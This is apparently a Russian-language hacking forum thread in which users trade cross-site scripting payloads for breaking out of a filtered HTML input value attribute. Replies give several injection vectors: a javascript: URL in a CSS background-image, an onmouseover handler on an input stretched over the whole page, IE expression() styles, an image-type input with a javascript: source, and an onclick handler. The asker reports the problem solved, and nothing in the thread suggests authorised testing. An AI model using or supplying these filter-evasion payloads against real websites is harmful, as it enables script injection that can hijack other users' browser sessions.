Собственно <input value="XSS" />
Фильтруется только <
<input value="" style=background-image:url('javascript:alert();'); /> Пашет только в ИЕ.
Есть другие способы javascript всунуть, кроме background-image ?

<input value="" onmouseover="alert('xek')" style="position:absolute;top:0;left:0;width:1600;height:1 200;z-index:100;left:expression(alert('xek'));"/>
для Оперы и Огнелиса - Input растягивается на всю страницу и JavaScript пишется в onMouseOver.
для ИЕ есть возможность исполнять JavaScript через стиль используя expression()

Что-то я по серъезному тупанул, вообще забыл про события в javascript. =\
Спасибо, проблема решена.

Оказывается, есть и кроссбраузерный вариант:
<input value="" type=image src="javascript:alert()"/>
Но работает он только если тип input'a еще не был определен.

<input type=button OnClick="javascript:alert()">

Наверное так тоже сработает, хотя хз я все позабыл на хрен! =/